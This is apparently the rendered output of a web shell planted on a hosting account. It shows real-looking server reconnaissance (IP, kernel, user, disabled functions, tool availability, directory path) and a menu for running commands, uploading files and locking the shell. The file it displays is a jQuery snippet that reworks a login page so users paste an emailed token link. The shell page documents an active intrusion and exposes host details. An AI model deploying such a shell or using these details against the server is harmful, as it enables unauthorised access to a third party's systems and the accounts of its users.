Server IP : 82.180.170.48 / Your IP : 3.14.79.153 Web Server : LiteSpeed System : Linux us-phx-web1609.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64 User : u636808025 ( 636808025) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u636808025/domains/converta.app/public_html/server/../demo/../../public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
---|
let interval jQuery(document).ready(function() { interval = setInterval(addDiscountsummary, 100); }); function addDiscountsummary() { if(jQuery("#login-page").text().indexOf('Verifique a sua caixa de entrada.') >= 0){ jQuery("#login-page:contains('Verifique a sua caixa de entrada.')").hide(); jQuery("#login-layout[_ngcontent-web-community-c38] main[_ngcontent-web-community-c38]").css('min-heigth','150px'); jQuery("login-page").append("<form> <div style='text-align: center; padding: 40px 10px 20px 0px;'>Cole abaixo o link recebido por e-mail</div> <input id='senhaemail' name='senha' style='width: 100%; border: 1px solid #999; padding: 10px;'></form><button type='submit' id='entraremail' style='font-size: 1rem; line-height: 1.15rem; color: var(--secondary_color); background-color: var(--primary_color); border-color: var(--primary_color); border-style: solid; text-align: center; width: 100%; height: 49px;'>Entrar</button>"); clearInterval(interval) $( "#entraremail" ).on( "click", function() { if(document.getElementById("senhaemail").value.indexOf('?token') >= 0){ window.location.href=document.getElementById("senhaemail").value; } else{ alert("Link inválido"); jQuery("#senhaemail").val(""); } } ); } else{ } }